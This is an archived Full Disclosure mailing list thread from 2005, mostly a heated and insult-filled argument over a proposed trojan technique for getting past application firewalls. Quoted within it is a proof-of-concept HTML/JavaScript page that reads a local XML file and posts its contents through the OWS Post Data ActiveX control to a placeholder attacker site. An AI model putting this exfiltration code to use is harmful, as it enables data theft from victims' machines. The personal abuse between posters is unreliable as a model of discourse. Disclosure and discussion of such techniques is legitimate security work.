Full Disclosure mailing list archives
Re: new attack technique? using JavaScript+XML+OWSPost Data
From: Test Drive <testdrive6 () gmail com>
Date: Thu, 22 Dec 2005 18:02:32 +0000
Basically Gaurav, we should tell a moron that he is a moron. By the look and feel of his website anyone can tell how mature he is, leave the content alone. Otherwise known as tr0y claims many things which we know are have no true existance. His resume is full of shit, lolz "Key-loggers with back-doors"....tell me if i am wrong, basically u do not understand what a backdoor is. //TD6 On 12/22/05, Gaurav Kumar <gaurav () securebox org> wrote:
All I have to say is that we should cut the crap. I just thought of a possible attack scenario which I proved using a PoC and posted to this mailing list for discussion and constructive feedback which can help in developing more secure applications. All I got from debasis is "PISS OFF, LAME, KID, MORON". He asked me to do more research before posting anything. I proved I was right using a screenshot. Looks like it has hurted his ego. I might be kid enough not to understand the purpose of this list but I am mature enough to understand flaming is NOT the purpose. So I would rather like to suggest we should stop this thread. Thank you all. Gaurav. On 12/22/05, name pipe <namepipe () gmail com> wrote:Before flaming others just look at urself. wtf u do moron debasis ,sellnessus reports for 5K, without even removing false +ives ?? This is ur elite resume -> http://seclists.org/lists/security-jobs/2003/Oct/0156.html hahaha Ethical Hacker ???? omfg. You trying to be next fadia or wat ? Doyouwant me to post ur lame Firewall bypass vulnerabilities links which have been already founded years before? Basically u are an asshole. So stfu. On 12/22/05, Debasis Mohanty <mail () hackingspirits com> wrote:Keep it up moron !!oh yes, i am a kid compared to u (i am 22 and 27, so i am 5 years kidder than u)Shit !! Another several years ppl has to tolerate your stupidity tillyouactuall _grow up_.Tell me one thing, a Windows XP + Offfice XP + Internet explorer combination so rare ?Is this a new topic ?? I mean are you done with your firewall and some weired trojan design :P - D -----Original Message----- From: gkverma () gmail com [mailto:gkverma () gmail com] On Behalf Of GauravKumarSent: Thursday, December 22, 2005 10:23 PM To: Debasis Mohanty Cc: full-disclosure () lists grok org uk Subject: Re: [Full-disclosure] new attack technique? using JavaScript+XML+OWSPost Data typo- i am 22 and YOU ARE 27, so i am 5 years kidder than u. On 12/22/05, Gaurav Kumar < gaurav () securebox org> wrote:oh yes, i am a kid compared to u (i am 22 and 27, so i am 5 years kidder than u) The _real_ thing is that I proved the point. U told win xp will give access denied error. I proved u wrong withtheproof attached. U told above technique wont work...i proved u wrong. Tell me one thing, a Windows XP + Offfice XP + Internet explorer combination so rare ? Is that all making ur ego shattered? ...and u are no one to decide what should one disuss on this list. regards, gaurav On 12/22/05, Debasis Mohanty < mail () hackingspirits com> wrote:Kid, Although I normally don't reply to such frivilous and lame statements but your reply has seriously piss me off.. So dropping few lines, perhaps will help you grow up !! -----Original Message-----From: Gaurav Kumar brazenly wrote:Looks like u need to read again what i wrote. I didnt use the word'spread'. I don't have to !! I can still remember your priceless statements [1] + [2] - [1] A Trojan has been to be placed in a system running an application [1] firewall like Zone Alarm Pro etc. [2] The target system must be having office XP and the user has to be [2] lured to view a webpage hosted by attacker. ROFL !! May be you could just ask your l33t victim to send you his passwords and other info by email :P Don't forget to send him your l33t email ID - '@ securebox.org'[3] Moreover, u need not know if the target system is runningZAornot...[3] "the technique works even if firewall is not installed".[4] I am discussing a possible 'design' of a trojan here,"doesntmatteris ZA[4] or any other FW is running on client".Looking at statement [3] & [4], (especially the statement within double quotes) just made me believe that you don't know what your are talking about unless you want to look like an idiot.really? ever heard of IE exploits?Priceless !!Well..Exactly! i would suggest u read the 'assumptions' first, its an assumption that user will click yes to warning...likemost'normal'users do. Yet another priceless statement... Maybe you could just ask your l33t victim to click 'yes' to your l33t piece of code trying to download some l33t piece of shit which will fail to run and dielikeanidiot.I am sure you have enough l33t skills to strick back to keep your ego up2date however, I wud rather suggest if you have only your stupidity to share then feel free to take it offline and don'tpissoff everyone in this list. I would welcome you if you really wanttostrike back with some _serious_ technical stuff. (Note: make anoteof _serious_ in the statement) - D -----Original Message----- From: gkverma () gmail com [mailto:gkverma () gmail com] On Behalf Of Gaurav Kumar Sent: Thursday, December 22, 2005 8:52 AM To: Debasis Mohanty Cc: full-disclosure () lists grok org uk;websecurity () webappsec orgSubject: Re: [WEB SECURITY] RE: [Full-disclosure] new attacktechnique?using JavaScript+XML+OWSPost Data On 12/22/05, Debasis Mohanty <mail () hackingspirits com> wrote:-----Original Message----- From: Gaurav Kumar Sent: Wednesday, December 21, 2005 8:59 PM To: full-disclosure () lists grok org uk Cc: websecurity () webappsec org Subject: [Full-disclosure] new attack technique? using JavaScript+XML+OWSPost Data 1>> A Trojan has been to be placed in a system running an 1>> application firewall like Zone Alarm Pro etc.Assumptions:2>> The target system must be having office XP and the user hasto2>> be lured to view a webpage hosted by attacker. 3>> The Trojan can be designed to generate an xml file whichwill3>> contain the data to be sent out. The attacker will lure the 3>> user to visit a website hosted by him. Lol !! In a practical scenario, the attacker who spreads the worm/trojans himself is not aware in the initial stage which are the infected machines unless the trojan sends back the machine/user info back to the attacker. Now as you have already mentioned ZA is running then no data can be sent back to the attacker. So the attacker is cluelesswhich are those infected machines. Looks like u need to read again what i wrote. I didnt use the word'spread'.Moreover, u need not know if the target system is running ZA or not...the technique works even if firewall is not installed. I am discussing a possible 'design' of a trojan here, doesnt matter isZAor any other FW is running on client.So the case of luring the user to visit the link is out ofscope...really? ever heard of IE exploits?The site can have following HTML code-Now coming back to technical stuff, You are trying to access a local file which will only be allowed if the site is in "Trusted Sites" or "Local Intranet" or "Local Security Zone" and activexnotmarked safe.The fact that *the client is also the server* is irrelevant. Try uploading the script to some webserver and give a html extention; it will throw an _access denied_ error when the page loads (even on Win XP + SP1). In case of any server side extention like *.asp, *.jsp etc, the user will be prompted that an malicious component is trying to load and ask for user permission.<html> <body> The author is not responsible for any misuse, this PoC is for educational purpose only. <objectclassid="clsid:{BDEADE98-C265-11D0-BCED-00A0C90AB50F}"id="exp"> </object> <script LANGUAGE=javascript> var xmlDoc xmlDoc = new ActiveXObject("Microsoft.XMLDOM"); xmlDoc.async=false ; xmlDoc.load("c:\\note.xml"); xmlObj=xmlDoc.documentElement; var a= xmlObj.firstChild.text; exp.Post(0,"http://www.attackersite.com/input.asp",a);</script> </body> </html>The above code (works well on windows XP SP2) essentialscalls"OWS Post Data" COM control to post the contents of note.xml (generated by trojan) to attackersite.comIMHO, never conduct such tests in a "Intranet Zone" or "LocalZone"and draw conclusion about "Internet Security Zone". You may also link to know about this issue - http://support.microsoft.com/kb/317244/EN-US/Essentially, the technique is breaking the basicfunctionalityof application firewalls by using OWS Post Data as bridgeforsending out the data using Javascript and XML.Not Exactly !! I wud rather suggest you to do a little more research and draw any conclusion. Keep those _Security Zones_ in mind before you post anything...Well..Exactly! i would suggest u read the 'assumptions' first, its an assumption that user will click yes to warning...like most'normal'users do.- D_______________________________________________ Full-Disclosure - We believe in it. Charter:http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: new attack technique? using JavaScript+XML+OWS Post Data, (continued)
- Re: new attack technique? using JavaScript+XML+OWS Post Data Joachim Schipper (Dec 21)
- RE: new attack technique? using JavaScript+XML+OWSPost Data Debasis Mohanty (Dec 21)
- Message not available
- Re: [WEB SECURITY] RE: new attack technique? using JavaScript+XML+OWSPost Data Gaurav Kumar (Dec 21)
- Re: [WEB SECURITY] RE: new attack technique? using JavaScript+XML+OWSPost Data Gaurav Kumar (Dec 21)
- RE: new attack technique? using JavaScript+XML+OWSPost Data Debasis Mohanty (Dec 22)
- Message not available
- Re: new attack technique? using JavaScript+XML+OWSPost Data Gaurav Kumar (Dec 22)
- Re: new attack technique? using JavaScript+XML+OWSPost Data Gaurav Kumar (Dec 22)
- RE: new attack technique? using JavaScript+XML+OWSPost Data Debasis Mohanty (Dec 22)
- Re: new attack technique? using JavaScript+XML+OWSPost Data name pipe (Dec 22)
- Re: new attack technique? using JavaScript+XML+OWSPost Data Gaurav Kumar (Dec 22)
- Re: new attack technique? using JavaScript+XML+OWSPost Data Test Drive (Dec 22)
- RE: new attack technique? usingJavaScript+XML+OWSPost Data Debasis Mohanty (Dec 22)
- RE: new attack technique? usingJavaScript+XML+OWSPost Data Debasis Mohanty (Dec 22)
- Re: [WEB SECURITY] RE: new attack technique? using JavaScript+XML+OWSPost Data Gaurav Kumar (Dec 21)
- RE: new attack technique? using JavaScript+XML+OWSPost Data Debasis Mohanty (Dec 22)
- Re: new attack technique? using JavaScript+XML+OWSPost Data Test Drive (Dec 22)
- Broadcast storm in my network/ any ideas wilder_jeff Wilder (Dec 22)
- Re: Broadcast storm in my network/ any ideas 3APA3A (Dec 22)
- Re: Broadcast storm in my network/ any ideas TheGesus (Dec 22)
- Re: Broadcast storm in my network/ any ideas J.A. Terranson (Dec 22)
- Re: new attack technique? usingJavaScript+XML+OWSPost Data Morning Wood (Dec 22)
- Re: new attack technique? usingJavaScript+XML+OWSPost Data Abhisek Datta (Dec 22)